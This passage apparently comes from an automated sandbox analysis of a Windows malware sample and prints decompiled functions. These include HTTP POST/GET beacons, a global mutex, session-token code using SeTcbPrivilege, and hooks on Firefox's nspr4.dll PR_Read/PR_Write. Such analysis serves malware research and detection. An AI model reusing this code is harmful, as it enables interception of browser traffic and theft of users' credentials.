0x00407b3b
0x00407b3c
0x00407b40
0x00000000
0x00407b40
0x00407b32
0x00000000
0x00407b32

APIs

GetWindowLongW.USER32(00000000,000000F0), ref: 00407B8E
GetParent.USER32(00000000), ref: 00407BB0
GetWindowThreadProcessId.USER32(?,00000000), ref: 00407BD5
IsWindow.USER32(?), ref: 00407BF8

Part of subcall function 004075F4: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00407608
Part of subcall function 004075F4: ReleaseMutex.KERNEL32(?), ref: 00407627
Part of subcall function 004075F4: GetWindowRect.USER32 ref: 00407634
Part of subcall function 004075F4: IsRectEmpty.USER32(?), ref: 004076B8
Part of subcall function 004075F4: GetWindowLongW.USER32(?,000000F0), ref: 004076C7
Part of subcall function 004075F4: GetParent.USER32(?), ref: 004076DD
Part of subcall function 004075F4: MapWindowPoints.USER32 ref: 004076E6
Part of subcall function 004075F4: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0040770A

GetWindowInfo.USER32 ref: 00407C48
PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 00407D85

Part of subcall function 00407585: WaitForSingleObject.KERNEL32(?,000000FF,7743A660,004079BE,00000000), ref: 0040758B
Part of subcall function 00407585: ReleaseMutex.KERNEL32(?), ref: 004075BF
Part of subcall function 00407585: IsWindow.USER32(?), ref: 004075C6
Part of subcall function 00407585: PostMessageW.USER32(?,00000215,00000000,?), ref: 004075E0

Strings

@, xrefs: 00407CDE
<, xrefs: 00407C41
, xrefs: 00407B2C

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$LongMessageMutexObjectParentPostRectReleaseSingleWait$EmptyInfoPointsProcessThread
String ID: $<$@
API String ID: 3705211839-2197183666
Opcode ID: ffaacd615c24142a9139eb9c8131efa86fb6ed20c5413290bb4b10ed72a20a3a
Instruction ID: c825605dac071c82af849eb393ea501e35fadda9e5444364dc6277d18302d378
Opcode Fuzzy Hash: ffaacd615c24142a9139eb9c8131efa86fb6ed20c5413290bb4b10ed72a20a3a
Instruction Fuzzy Hash: 1E91B370E08348ABEB119E558985FBF7BB4AF40748F14407AF940762D1C7BCAA81D75A

Uniqueness

Uniqueness Score: -1.00%

Function 00418109, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 67
networkCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00418109(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
				long _t18;
				char* _t21;
				signed int _t29;
				char* _t30;
				void* _t32;

				_t29 = _a20 & 0x00000002;
				_t18 = 0x8404f700;
				if(_t29 != 0) {
					_t18 = 0x8444f700;
				}
				if((_a20 & 0x00000004) != 0) {
					_t18 = _t18 | 0x00800000;
				}
				_t30 = "POST";
				if((_a20 & 0x00000001) == 0) {
					_t30 = "GET";
				}
				_t32 = HttpOpenRequestA(_a4, _t30, _a8, "HTTP/1.1", 0, "�H@", _t18, 0);
				if(_t32 == 0) {
					L15:
					return 0;
				} else {
					if(_t29 == 0) {
						_push(0x13);
						_t21 = "Connection: close\r\n";
						_pop(0);
					} else {
						_t21 = 0;
					}
					if(HttpSendRequestA(_t32, _t21, 0, _a12, _a16) == 0) {
						L14:
						InternetCloseHandle(_t32);
						goto L15;
					} else {
						_a20 = _a20 & 0x00000000;
						_a8 = 4;
						if(HttpQueryInfoA(_t32, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
							goto L14;
						} else {
							return _t32;
						}
					}
				}
			}

0x00418110
0x00418114
0x00418119
0x0041811b
0x0041811b
0x00418124
0x00418126
0x00418126
0x0041812f
0x00418134
0x00418136
0x00418136
0x00418157
0x0041815b
0x004181bb
0x00000000
0x0041815d
0x0041815f
0x00418167
0x00418169
0x0041816e
0x00418161
0x00418161
0x00418163
0x00418180
0x004181b4
0x004181b5
0x00000000
0x00418182
0x00418182
0x00418196
0x004181a5
0x00000000
0x004181b0
0x00000000
0x004181b0
0x004181a5
0x00418180

APIs

HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,H@,8404F700,00000000), ref: 00418151
HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 00418178
HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 0041819D
InternetCloseHandle.WININET(00000000), ref: 004181B5

Strings

Connection: close, xrefs: 00418169, 00418176
H@, xrefs: 0041813E
GET, xrefs: 00418136, 0041814D
HTTP/1.1, xrefs: 00418145
POST, xrefs: 0041812F

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
String ID: Connection: close$GET$HTTP/1.1$POST$H@
API String ID: 3080274660-2522771230
Opcode ID: 75f21b4dfa83db42cf8a44a0a0c6b44c577b70ca84c5a3fd311ab9d0f0ef7e64
Instruction ID: 0d041268688f69942ab74d9fc87565c432e31d5ce5f6ccb35d41d8e2edc9bda9
Opcode Fuzzy Hash: 75f21b4dfa83db42cf8a44a0a0c6b44c577b70ca84c5a3fd311ab9d0f0ef7e64
Instruction Fuzzy Hash: 1611B6722402097BEB218F509C45FE73A9CEB44754F14802AFE01E52E0DBB9DE9187EC

Uniqueness

Uniqueness Score: -1.00%

Function 0041D404, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 160
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041D404(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				char _v92;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				void* _t25;
				long _t27;
				void* _t28;
				long _t29;
				void* _t33;
				void* _t39;
				void* _t41;
				void* _t44;
				long _t49;
				void* _t50;
				void* _t57;
				void* _t62;
				void* _t69;
				void* _t73;
				WCHAR* _t77;
				void* _t78;
				void* _t80;
				void* _t82;

				_t73 = __edx;
				_t70 = __ecx;
				_t22 = E0040679A(__ecx, 0x743c1521, 2);
				_v28 = _t22;
				if(_t22 != 0) {
					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
					_t25 = E004068C0();
					__eflags = _t25;
					if(_t25 == 0) {
						L24:
						E00419BF4(_v28);
						__eflags = 0;
						return 0;
					}
					_t27 = WaitForSingleObject( *0x422e04, 0xea60);
					__eflags = _t27 - 0x102;
					if(_t27 != 0x102) {
						goto L24;
					}
					do {
						_t28 = E0040D68B(_t70);
						_v24 = _t28;
						__eflags = _t28;
						if(__eflags == 0) {
							goto L22;
						}
						_t80 = E0041BF9B( &_v16, _t73, __eflags, _t28, 2, 0x20000000);
						_v20 = _t80;
						__eflags = _t80;
						if(__eflags == 0) {
							L21:
							E00416421(_v20);
							E00416421(_v24);
							goto L22;
						}
						_t70 = _v16;
						_t33 = E0041CE99(_v16, __eflags, _t80);
						__eflags = _t33;
						if(_t33 == 0) {
							goto L21;
						} else {
							goto L8;
						}
						do {
							L8:
							_v8 = E004172F1(_t80, 1);
							_v12 = E004172F1(_t80, 2);
							_t39 = E004177D0(_t80, E00416F5E(_t80));
							_t72 = _v8;
							_t41 = E004177D0(_t72, E00416F5E(_v8));
							_t70 = _v12;
							_push(E004177D0(_t70, E00416F5E(_v12)));
							_push(_t41);
							_push(_t39);
							_push(L"Global\\%08X%08X%08X");
							_t73 = 0x20;
							_t77 =  &_v92;
							_t44 = E00417114(_t43, _t73, _t77);
							_t82 = _t82 + 0x10;
							__eflags = _t44 - 0x1f;
							if(_t44 != 0x1f) {
								goto L20;
							}
							_t69 = CreateMutexW(0x422978, 1, _t77);
							__eflags = _t69;
							if(_t69 == 0) {
								goto L20;
							}
							_t49 = GetLastError();
							__eflags = _t49 - 0xb7;
							if(_t49 == 0xb7) {
								CloseHandle(_t69);
								_t69 = 0;
								__eflags = 0;
							}
							__eflags = _t69;
							if(_t69 != 0) {
								_t50 = 0x10;
								_t78 = E004163F1(_t50);
								__eflags = _t78;
								if(_t78 == 0) {
									L19:
									E00419BF4(_t69);
									goto L20;
								}
								 *_t78 = E0041687F(_t51 | 0xffffffff, _t80);
								 *(_t78 + 4) = E0041687F(_t53 | 0xffffffff, _v8);
								_t57 = E0041687F(_t55 | 0xffffffff, _v12);
								__eflags =  *_t78;
								 *(_t78 + 8) = _t57;
								 *(_t78 + 0xc) = _t69;
								if( *_t78 == 0) {
									L18:
									E00416421( *_t78);
									E00416421( *(_t78 + 4));
									E00416421( *(_t78 + 8));
									E00416421(_t78);
									goto L19;
								}
								__eflags =  *(_t78 + 4);
								if( *(_t78 + 4) == 0) {
									goto L18;
								}
								__eflags = _t57;
								if(_t57 == 0) {
									goto L18;
								}
								_t62 = E00417E56(0x80000, E0041D159, _t78);
								__eflags = _t62;
								if(_t62 != 0) {
									goto L20;
								}
								goto L18;
							}
							L20:
							_t80 = E004172F1(_t80, 3);
							__eflags = _t80;
						} while (_t80 != 0);
						goto L21;
						L22:
						_t29 = WaitForSingleObject( *0x422e04, 0xea60);
						__eflags = _t29 - 0x102;
					} while (_t29 == 0x102);
					goto L24;
				}
				return _t22 + 1;
			}

0x0041d404
0x0041d404
0x0041d411
0x0041d416
0x0041d41b
0x0041d42c
0x0041d432
0x0041d437
0x0041d439
0x0041d5f7
0x0041d5fa
0x0041d5ff
0x00000000
0x0041d5ff
0x0041d44a
0x0041d450
0x0041d455
0x00000000
0x00000000
0x0041d45e
0x0041d45e
0x0041d463
0x0041d466
0x0041d468
0x00000000
0x00000000
0x0041d47e
0x0041d480
0x0041d483
0x0041d485
0x0041d5c8
0x0041d5cb
0x0041d5d3
0x00000000
0x0041d5d3
0x0041d48b
0x0041d48f
0x0041d494
0x0041d496
0x00000000
0x00000000
0x00000000
0x00000000
0x0041d49c
0x0041d49c
0x0041d4a5
0x0041d4b3
0x0041d4bd
0x0041d4c2
0x0041d4ce
0x0041d4d3
0x0041d4e4
0x0041d4e5
0x0041d4e6
0x0041d4e7
0x0041d4ee
0x0041d4ef
0x0041d4f2
0x0041d4f7
0x0041d4fa
0x0041d4fd
0x00000000
0x00000000
0x0041d513
0x0041d515
0x0041d517
0x00000000
0x00000000
0x0041d51d
0x0041d523
0x0041d528
0x0041d52b
0x0041d531
0x0041d531
0x0041d531
0x0041d533
0x0041d535
0x0041d539
0x0041d53f
0x0041d541
0x0041d543
0x0041d5af
0x0041d5b0
0x00000000
0x0041d5b0
0x0041d551
0x0041d55e
0x0041d564
0x0041d569
0x0041d56c
0x0041d56f
0x0041d572
0x0041d592
0x0041d594
0x0041d59c
0x0041d5a4
0x0041d5aa
0x00000000
0x0041d5aa
0x0041d574
0x0041d578
0x00000000
0x00000000
0x0041d57a
0x0041d57c
0x00000000
0x00000000
0x0041d589
0x0041d58e
0x0041d590
0x00000000
0x00000000
0x00000000
0x0041d590
0x0041d5b5
0x0041d5be
0x0041d5c0
0x0041d5c0
0x00000000
0x0041d5d8
0x0041d5e3
0x0041d5e9
0x0041d5e9
0x00000000
0x0041d5f6
0x00000000

APIs

Part of subcall function 0040679A: CreateMutexW.KERNEL32(00422978,00000000,?,?,?,?,?), ref: 004067BB

GetCurrentThread.KERNEL32 ref: 0041D425
SetThreadPriority.KERNEL32(00000000), ref: 0041D42C
WaitForSingleObject.KERNEL32(0000EA60), ref: 0041D44A
CreateMutexW.KERNEL32(00422978,00000001,?,20000000), ref: 0041D50D
GetLastError.KERNEL32 ref: 0041D51D
CloseHandle.KERNEL32(00000000), ref: 0041D52B

Strings

Global\%08X%08X%08X, xrefs: 0041D4E7

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateMutexThread$CloseCurrentErrorHandleLastObjectPrioritySingleWait
String ID: Global\%08X%08X%08X
API String ID: 3448221409-3239447729
Opcode ID: fcb061052ca67ac3872273e178e7d2ab1c4b1de1ee29fae26c9ff2fc6bdbeb51
Instruction ID: 9a7ac2e0a998d8810216bd4bcead9323f2a780a0af8eabb7b501b1bb6c75e5b0
Opcode Fuzzy Hash: fcb061052ca67ac3872273e178e7d2ab1c4b1de1ee29fae26c9ff2fc6bdbeb51
Instruction Fuzzy Hash: D341D3B0A00205BADB117BB69D86BEE7B66AF00718F10452BF511F62D2CB7CDDC1869C

Uniqueness

Uniqueness Score: -1.00%

Function 0040E73F, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040E73F(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				struct HINSTANCE__* _v8;
				char _v12;
				char _v16;
				_Unknown_base(*)()* _v20;
				intOrPtr _v24;
				char _v40;
				char _v60;
				char _v84;
				char _v112;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t30;
				_Unknown_base(*)()* _t42;
				intOrPtr _t44;
				intOrPtr _t50;
				intOrPtr* _t55;
				void* _t57;
				void* _t58;
				intOrPtr* _t59;
				CHAR* _t61;
				CHAR* _t62;
				CHAR* _t63;
				_Unknown_base(*)()* _t64;
				WCHAR* _t66;
				void* _t68;

				_t58 = __ecx;
				_t66 =  &_v112;
				E004159A4(0xdd, _t66);
				_t30 = LoadLibraryW(_t66);
				_v8 = _t30;
				if(_t30 == 0) {
					return _t30;
				}
				_t61 =  &_v84;
				E0041596E(0xde, _t61);
				_t55 = GetProcAddress(_v8, _t61);
				_t62 =  &_v40;
				E0041596E(0xdf, _t62);
				_v20 = GetProcAddress(_v8, _t62);
				_t63 =  &_v60;
				E0041596E(0xe0, _t63);
				_t42 = GetProcAddress(_v8, _t63);
				_t68 = 0;
				_t64 = _t42;
				if(_t55 == 0 || _v20 == 0 || _t64 == 0) {
					L14:
					return FreeLibrary(_v8);
				} else {
					_t44 = E00417AED(L"SeTcbPrivilege");
					__imp__WTSGetActiveConsoleSessionId();
					_v24 = _t44;
					if(_t44 != 0xffffffff) {
						E0040E6CE(_t58, 0, _t64, _t44, _a4, _a8);
					}
					_push( &_v12);
					_push( &_v16);
					_push(1);
					_push(_t68);
					_push(_t68);
					if( *_t55() == 0) {
						goto L14;
					} else {
						_t57 = 0;
						if(_v12 <= _t68) {
							L13:
							_v20(_v16);
							goto L14;
						} else {
							goto L8;
						}
						do {
							L8:
							_t59 = _t68 + _v16;
							_t50 =  *((intOrPtr*)(_t59 + 8));
							if(_t50 == 0 || _t50 == 4) {
								_t51 =  *_t59;
								if( *_t59 != _v24) {
									E0040E6CE(_t59, _t68, _t64, _t51, _a4, _a8);
								}
							}
							_t57 = _t57 + 1;
							_t68 = _t68 + 0xc;
						} while (_t57 < _v12);
						goto L13;
					}
				}
			}

0x0040e73f
0x0040e746
0x0040e74e
0x0040e756
0x0040e75c
0x0040e761
0x0040e844
0x0040e844
0x0040e769
0x0040e771
0x0040e784
0x0040e786
0x0040e78e
0x0040e79b
0x0040e79e
0x0040e7a6
0x0040e7b1
0x0040e7b3
0x0040e7b5
0x0040e7b9
0x0040e837
0x00000000
0x0040e7c4
0x0040e7c9
0x0040e7ce
0x0040e7d4
0x0040e7da
0x0040e7e4
0x0040e7e4
0x0040e7ec
0x0040e7f0
0x0040e7f1
0x0040e7f3
0x0040e7f4
0x0040e7f9
0x00000000
0x0040e7fb
0x0040e7fb
0x0040e800
0x0040e831
0x0040e834
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e802
0x0040e802
0x0040e805
0x0040e808
0x0040e80d
0x0040e814
0x0040e819
0x0040e823
0x0040e823
0x0040e819
0x0040e828
0x0040e829
0x0040e82c
0x00000000
0x0040e802
0x0040e7f9

APIs

LoadLibraryW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0040F08D,?,?), ref: 0040E756
GetProcAddress.KERNEL32(?,?), ref: 0040E782
GetProcAddress.KERNEL32(?,?), ref: 0040E799
GetProcAddress.KERNEL32(?,?), ref: 0040E7B1
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 0040E83A

Part of subcall function 00417AED: GetCurrentThread.KERNEL32 ref: 00417AFD
Part of subcall function 00417AED: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040E7CE,SeTcbPrivilege), ref: 00417B04
Part of subcall function 00417AED: OpenProcessToken.ADVAPI32(000000FF,00000020,0040E7CE,?,?,?,?,0040E7CE,SeTcbPrivilege), ref: 00417B16

WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,0040F08D,?,?,00000000), ref: 0040E7CE

Part of subcall function 0040E6CE: EqualSid.ADVAPI32(00000000,0040E847,?,0040E847,?,?,00000000), ref: 0040E6F3
Part of subcall function 0040E6CE: CloseHandle.KERNEL32(?,?,0040E847,?,?,00000000), ref: 0040E734

Strings

.exe, xrefs: 0040E768
SeTcbPrivilege, xrefs: 0040E7C4

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryOpenThreadToken$ActiveCloseConsoleCurrentEqualFreeHandleLoadProcessSession
String ID: .exe$SeTcbPrivilege
API String ID: 1107370034-552748125
Opcode ID: 2d34295adaef3d712a96226b5ce2cc068409ba0fed4c5f4c6a6d0205ca932b42
Instruction ID: 9531a6a5f15540e4083edd58231464e52328da975ad28a0a2add8a010421a8c6
Opcode Fuzzy Hash: 2d34295adaef3d712a96226b5ce2cc068409ba0fed4c5f4c6a6d0205ca932b42
Instruction Fuzzy Hash: 32317C76A00118ABDF11ABA6CC849EFBB78EF44710F144827F801F7290C7759E50CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00406239, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406239(void* __ecx, void* __edx, void* __eflags) {
				long _v8;
				signed int _v12;
				void _v532;
				void* __edi;
				void* __esi;
				unsigned int _t22;
				void* _t30;
				void* _t39;
				void* _t41;
				WCHAR* _t42;
				void* _t43;
				void* _t46;

				_t41 = __edx;
				_t39 = __ecx;
				InitializeCriticalSection(0x423148);
				 *0x42313c = 0;
				 *0x423144 = 0;
				 *0x423140 = 0;
				 *0x423138 = 0;
				 *0x422fec = 0;
				 *0x4230d4 = 0;
				 *0x4230d8 = 0;
				InitializeCriticalSection(0x4230bc);
				_t42 =  &_v532;
				E00406AB8(_t39, _t42, InitializeCriticalSection, 0);
				_v12 = _v12 | 0xffffffff;
				_v8 = 0x1fe;
				_t43 = CreateFileW(_t42, 0x80000000, 1, 0, 3, 0, 0);
				if(_t43 != 0xffffffff) {
					if(ReadFile(_t43,  &_v532, _v8,  &_v8, 0) != 0) {
						_v12 = _v8;
					}
					CloseHandle(_t43);
				}
				_t22 = _v12;
				if(_t22 == 0xffffffff || (_t22 & 0x00000001) != 0) {
					_t22 = 0;
				}
				 *((short*)(_t46 + (_t22 >> 1) * 2 - 0x210)) = 0;
				E00411253( &_v532);
				E0040C77A( &_v532);
				 *0x423118 = 0;
				 *0x423134 = 0;
				InitializeCriticalSection(0x42311c);
				E00408490(_t41);
				if(GetModuleHandleW(L"nspr4.dll") == 0) {
					_t30 = 0;
				} else {
					_t30 = E00409AF5(0, _t41, _t29);
				}
				if(_t30 != 0) {
					 *0x423114 =  *0x423114 | 0x00000001;
				}
				E004098BE();
				return 1;
			}

0x00406239
0x00406239
0x00406250
0x0040625b
0x00406261
0x00406267
0x0040626d
0x00406273
0x00406279
0x0040627f
0x00406285
0x00406288
0x0040628e
0x00406293
0x004062a6
0x004062b3
0x004062b8
0x004062d2
0x004062d7
0x004062d7
0x004062db
0x004062db
0x004062e1
0x004062e7
0x004062ed
0x004062ed
0x004062f3
0x00406301
0x0040630c
0x00406316
0x0040631c
0x00406322
0x00406324
0x00406336
0x00406341
0x00406338
0x0040633a
0x0040633a
0x00406345
0x00406347
0x00406347
0x0040634e
0x00406359

APIs

InitializeCriticalSection.KERNEL32(00423148,00000000,74B04EE0,00000000), ref: 00406250
InitializeCriticalSection.KERNEL32(004230BC), ref: 00406285

Part of subcall function 00406AB8: PathRenameExtensionW.SHLWAPI(?,.dat,?,004229A0,00000032,77E49EB0,?,00000000), ref: 00406B33

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 004062AD
ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 004062CA
CloseHandle.KERNEL32(00000000), ref: 004062DB
InitializeCriticalSection.KERNEL32(0042311C), ref: 00406322
GetModuleHandleW.KERNEL32(hH3@), ref: 0040632E

Strings

hH3@, xrefs: 00406329

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalInitializeSection$FileHandle$CloseCreateExtensionModulePathReadRename
String ID: hH3@
API String ID: 1155594396-602470440
Opcode ID: ca5451a366f9f094ffa8c8c67f81f39602a319e42b2caed63327b184f5c3008e
Instruction ID: f91805aae0f6b9fabe66f3127cc53c8790545bdc1383c7d088834e03b91c3b45
Opcode Fuzzy Hash: ca5451a366f9f094ffa8c8c67f81f39602a319e42b2caed63327b184f5c3008e
Instruction Fuzzy Hash: 01318431600208ABC720AFA99DC5AEA7BB8EB04315F50057FE515F32E1DB789F568B5C

Uniqueness

Uniqueness Score: -1.00%

Function 00409AF5, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 36
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00409AF5(void* __ecx, void* __edx, struct HINSTANCE__* __edi) {
				void* __ebx;
				_Unknown_base(*)()* _t4;
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t12;

				_t12 = __edx;
				_t11 = __ecx;
				 *0x422360 = GetProcAddress(__edi, "PR_OpenTCPSocket");
				 *0x422370 = GetProcAddress(__edi, "PR_Close");
				 *0x422380 = GetProcAddress(__edi, "PR_Read");
				_t4 = GetProcAddress(__edi, "PR_Write");
				_push(0x422360);
				_t9 = 4;
				 *0x422390 = _t4;
				_t10 = E0040982D(_t9, _t11, _t12);
				if(_t10 != 0) {
					E0040C833(__edi,  *0x422368,  *0x422378,  *0x422388,  *0x422398);
				}
				return _t10;
			}

0x00409af5
0x00409af5
0x00409b0b
0x00409b18
0x00409b25
0x00409b2a
0x00409b2c
0x00409b33
0x00409b34
0x00409b3e
0x00409b42
0x00409b5e
0x00409b5e
0x00409b67

APIs

GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 00409B03
GetProcAddress.KERNEL32(00000000,PR_Close), ref: 00409B10
GetProcAddress.KERNEL32(00000000,PR_Read), ref: 00409B1D
GetProcAddress.KERNEL32(00000000,PR_Write), ref: 00409B2A

Part of subcall function 0040982D: VirtualAllocEx.KERNEL32(000000FF,00000000,00000034,00003000,00000040,00000000,77E49EB0,?,?,00409AF3,00422020,00000000,00406353), ref: 00409864

Part of subcall function 0040C833: InitializeCriticalSection.KERNEL32(00422FAC,74B04EE0,00409B63,00422360), ref: 0040C849
Part of subcall function 0040C833: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0040C885
Part of subcall function 0040C833: GetProcAddress.KERNEL32(PR_SetError), ref: 0040C897
Part of subcall function 0040C833: GetProcAddress.KERNEL32(PR_GetError), ref: 0040C8A9

Strings

PR_Read, xrefs: 00409B12
PR_Write, xrefs: 00409B1F
PR_Close, xrefs: 00409B05
PR_OpenTCPSocket, xrefs: 00409AFD

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCriticalInitializeSectionVirtual
String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
API String ID: 1833644279-3954199073
Opcode ID: 518b9cd3a212a064f0de57d48a9eb7895937e1e24e29b25bbd83ed6fe4c0ba14
Instruction ID: 8c5ad86b2b66b284ee94fc4aeeef2d256be4f1e040b1b3f3a0cab2fd5d52fef0
Opcode Fuzzy Hash: 518b9cd3a212a064f0de57d48a9eb7895937e1e24e29b25bbd83ed6fe4c0ba14
Instruction Fuzzy Hash: 5FF09071B403147ACB20AF76AD46E527FACB746B10384013BB900A72B0CBFD4542DA4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040D022, Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 247
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040D022(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v20;
				void* _v24;
				void* _v28;
				char _v36;
				char _v40;
				signed int _v44;
				void* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				void* _v72;
				void* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t99;
				signed int _t100;
				signed int _t101;
				intOrPtr _t103;
				void* _t104;
				signed int _t107;
				signed int _t108;
				signed int _t110;
				intOrPtr _t119;
				void* _t131;
				signed int _t139;
				void* _t149;
				struct _CRITICAL_SECTION* _t153;
				intOrPtr _t155;
				signed int _t168;
				signed int _t174;
				char _t176;
				void* _t177;
				intOrPtr _t179;
				void* _t182;
				signed int _t183;
				intOrPtr _t186;
				void* _t188;
				signed int _t189;
				void* _t191;
				void* _t192;
				void* _t193;
				signed int _t195;
				void* _t197;
				void* _t199;

				_t197 = (_t195 & 0xfffffff8) - 0x34;
				_t99 = E004068C0();
				_t179 = _a4;
				if(_t99 == 0 || _a8 == 0 || _a12 <= 0) {
					L40:
					_t100 =  *0x422fd0(_t179, _a8, _a12);
					goto L41;
				} else {
					_t153 = 0x422fac;
					EnterCriticalSection(0x422fac);
					_t101 = E0040C3C0(_t179);
					if(_t101 == 0xffffffff) {
						L39:
						LeaveCriticalSection(_t153);
						goto L40;
					}
					_t103 = _t101 * 0x38 +  *0x422fc8;
					if( *((intOrPtr*)(_t103 + 0x30)) > 0) {
						L32:
						_t182 =  *((intOrPtr*)(_t103 + 0x30)) -  *((intOrPtr*)(_t103 + 0x34));
						_t85 = _t103 + 0x2c; // -4337564
						_t173 = _t85;
						__eflags = _a12 - _t182;
						_t183 =  <  ? _a12 : _t182;
						_t104 = E0041645D(_a8,  *_t85 +  *((intOrPtr*)(_t103 + 0x34)), _t183);
						 *((intOrPtr*)(_t104 + 0x34)) =  *((intOrPtr*)(_t104 + 0x34)) + _t183;
						__eflags =  *((intOrPtr*)(_t104 + 0x34)) -  *((intOrPtr*)(_t104 + 0x30));
						if( *((intOrPtr*)(_t104 + 0x34)) ==  *((intOrPtr*)(_t104 + 0x30))) {
							E004164D4(E00416421( *_t173), _t173, 0, 0xc);
						}
						LeaveCriticalSection(_t153);
						_t100 = _t183;
						L41:
						return _t100;
					}
					if( *((intOrPtr*)(_t103 + 0x10)) <= 0) {
						goto L39;
					}
					LeaveCriticalSection(0x422fac);
					_t107 =  *0x422fd0(_t179, _a8, _a12);
					_t199 = _t197 + 0xc;
					_v52 = _t107;
					if(_t107 <= 0xffffffff) {
						L38:
						_t100 = _v52;
						goto L41;
					}
					EnterCriticalSection(0x422fac);
					_t108 = E0040C3C0(_t179);
					_t174 = _t108;
					if(_t174 == 0xffffffff) {
						L35:
						_push(8);
						_push(0xffffe890);
						L36:
						 *0x422fa8();
						_v52 = _v52 | 0xffffffff;
						L37:
						LeaveCriticalSection(_t153);
						goto L38;
					}
					_t168 = _v52;
					if(_t168 == 0) {
						L11:
						_t176 = _t174 * 0x38 +  *0x422fc8;
						_v36 = _t176;
						if(_t168 > 0) {
							E0041645D( *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t176 + 0x18)), _a8, _t168);
							 *((intOrPtr*)(_t176 + 0x18)) =  *((intOrPtr*)(_t176 + 0x18)) + _t168;
						}
						_t110 = E0040CC46(_t156,  &_v20,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t176 + 0x18)));
						_v52 = _t110;
						if(_t110 == 1) {
							_t119 = E0040CDF0( &_v20,  *((intOrPtr*)(_t176 + 0x18)),  *((intOrPtr*)(_t176 + 0x14)), ( &_v48 & 0xffffff00 | _v52 == 0x00000000) & 0x000000ff,  &_v48,  &_v40);
							_v60 = _t119;
							if(_t119 == 1) {
